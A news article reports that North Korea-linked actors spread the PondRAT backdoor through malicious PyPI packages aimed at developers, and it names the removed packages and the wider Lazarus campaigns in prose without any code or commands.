PondRAT Malware Hides in Python Packages

Lilu Anderson
Photo: Finoracle.net

PondRAT Malware Hidden in Python Packages

Threat actors associated with North Korea have been observed using compromised Python packages to distribute a new malware variant known as PondRAT. This development appears to be a continuation of an existing campaign involving cyber attacks, specifically targeting software developers.

Understanding PondRAT and Its Origins

PondRAT is believed to be a lighter version of a previously identified malware called POOLRAT (also known as SIMPLESEA), a backdoor used in attacks against macOS systems. This malware is connected to the Lazarus Group, a well-known cybercriminal organization linked to the North Korean government. The Lazarus Group was previously involved in the 3CX supply chain attack last year.

Operation Dream Job Campaign

Some instances of PondRAT have been tied to a broader cyber attack campaign dubbed Operation Dream Job. This campaign involves luring potential targets under the guise of attractive job offers, consequently tricking them into downloading malicious software.

Infiltration via Python Packages

According to cybersecurity researcher Yoav Zemah from Unit 42, attackers uploaded several tainted Python packages to PyPI, a popular repository for open-source Python software. This action is linked with moderate confidence to a threat actor identified as Gleaming Pisces. This entity is also known in the cybersecurity community as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736 – all sub-groups under the Lazarus Group known for distributing additional malware such as AppleJeus.

Malicious Packages and Infection Chain

The malicious packages, which have since been removed from PyPI, included:

  • real-ids (893 downloads)
  • coloredtxt (381 downloads)
  • beautifultext (736 downloads)
  • minisound (416 downloads)

Once these packages are downloaded and installed on a developer's system, they trigger a sequence that downloads the Linux and macOS versions of the RAT (Remote Access Trojan) malware from a remote server. This simple infection chain capitalizes on the user's trust in the PyPI repository.

Capabilities and Risks

Further analysis shows that PondRAT shares similarities with both POOLRAT and AppleJeus, suggesting that Gleaming Pisces is broadening its capabilities across Linux and macOS platforms. The malware's successful deployment can lead to a widespread network compromise.

Broader Implications for Businesses

The KnowBe4 security firm disclosed that they were deceived into hiring a North Korean threat actor. More than a dozen other companies reportedly hired North Korean individuals or were flooded with fraudulent resumes. This activity is characterized as a "complex, industrial, scaled nation-state operation" and highlights the risks for companies with remote-only employees.

In conclusion, businesses and developers are advised to remain vigilant against potential software supply chain threats and to scrutinize job applicants more closely to mitigate these emerging cybersecurity risks.

Share This Article
Lilu Anderson is a technology writer and analyst with over 12 years of experience in the tech industry. A graduate of Stanford University with a degree in Computer Science, Lilu specializes in emerging technologies, software development, and cybersecurity. Her work has been published in renowned tech publications such as Wired, TechCrunch, and Ars Technica. Lilu’s articles are known for their detailed research, clear articulation, and insightful analysis, making them valuable to readers seeking reliable and up-to-date information on technology trends. She actively stays abreast of the latest advancements and regularly participates in industry conferences and tech meetups. With a strong reputation for expertise, authoritativeness, and trustworthiness, Lilu Anderson continues to deliver high-quality content that helps readers understand and navigate the fast-paced world of technology.